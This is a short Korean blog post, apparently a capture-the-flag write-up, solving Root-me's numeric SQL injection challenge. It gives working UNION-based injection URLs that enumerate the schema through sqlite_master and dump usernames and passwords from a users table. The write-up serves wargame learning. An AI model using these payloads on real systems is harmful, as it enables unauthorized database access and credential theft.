http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=3
news 부분에 news_id 부분에서 sqli 가 일어나는데
(http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=4%20or%201)
저는 이런식으로 sqli 를 확인했슴다.
아마 union 구문으로 sqli 가 될거 같아서 order by 구문으로 보니 3개까지 받았습니다.
그럼 이제 table 이름을 알아내야 해서
union SELECT name,2 FROM sqli_master WHERE type = 'table' --
구문으로 알아내려 했더니
(http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=4%20union%20SELECT%20name,2%20FROM%20sqli_master%20WHERE%20type%20=%20%27table%27%20--)
아무래도 quote 를 다 막은거 같습니다.. 그래서 다른방법이 없나 하고 찾아보았더니,
union SELECT 1,2,sql FROM sqlite_master#
이런 모양의 구문이 있었습니다. 바로 트라이 ㄱㄱ
(http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=4%20union%20SELECT%201,2,sql%20FROM%20sqlite_master#)
오호 table 명과 column 명까지 한방에 알아올 수 있었습니다.
바로 마무리 ㄱㄱ
(http://challenge01.root-me.org/web-serveur/ch18/?action=news&news_id=4%20union%20SELECT%20Year,%20username,%20password%20FROM%20users#)
클리어
'Web' 카테고리의 다른 글
| [Insomni' hack] Vulnshop (0) | 2018.01.22 |
|---|---|
| [ch4n3 world] mailbox (0) | 2018.01.05 |
| [Root-me] sqli - string (0) | 2017.09.24 |
| [Root-me] sqli - auth (0) | 2017.09.24 |
| Wargame.kr - SimpleBoard (0) | 2017.09.08 |